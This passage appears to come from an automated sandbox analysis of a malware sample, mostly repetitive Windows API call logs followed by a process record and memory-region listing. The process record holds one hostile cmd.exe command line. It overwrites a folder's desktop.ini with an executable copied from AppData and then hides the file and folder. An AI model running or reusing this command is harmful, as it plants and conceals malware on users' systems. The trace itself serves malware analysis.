_get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.410] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.410] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType 
(hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.412] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.412] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, 
lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, 
lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.413] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.413] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.415] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.415] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.416] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.416] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, 
lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: 
lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.417] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.417] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x32, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.418] GetFileType (hFile=0x4c) returned 0x1 [0134.418] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.418] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x32, lpOverlapped=0x0) returned 1 [0134.418] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.418] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.418] _close (_FileHandle=4) returned 0 [0134.418] FindNextFileW (in: hFindFile=0x1d0e88, lpFindFileData=0x16f0f4 | out: lpFindFileData=0x16f0f4) returned 0 [0134.428] GetLastError () returned 0x12 [0134.428] FindClose (in: hFindFile=0x1d0e88 | out: hFindFile=0x1d0e88) returned 1 [0134.428] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0134.428] _close (_FileHandle=3) returned 0 [0134.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.428] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.429] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.429] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0134.429] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.429] SetConsoleInputExeNameW () returned 0x1 [0134.429] GetConsoleOutputCP () returned 0x1b5 [0134.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.429] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.429] exit (_Code=0) Process: id = "129" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xc10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13264 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13265 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13266 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13267 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13268 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13269 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13270 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13271 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13272 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 13273 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13322 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13323 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13324 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13325 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000200000" filename = "" Region: id = 13326 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 13327 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13328 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13329 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13330 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13331 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13332 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13333 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13334 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
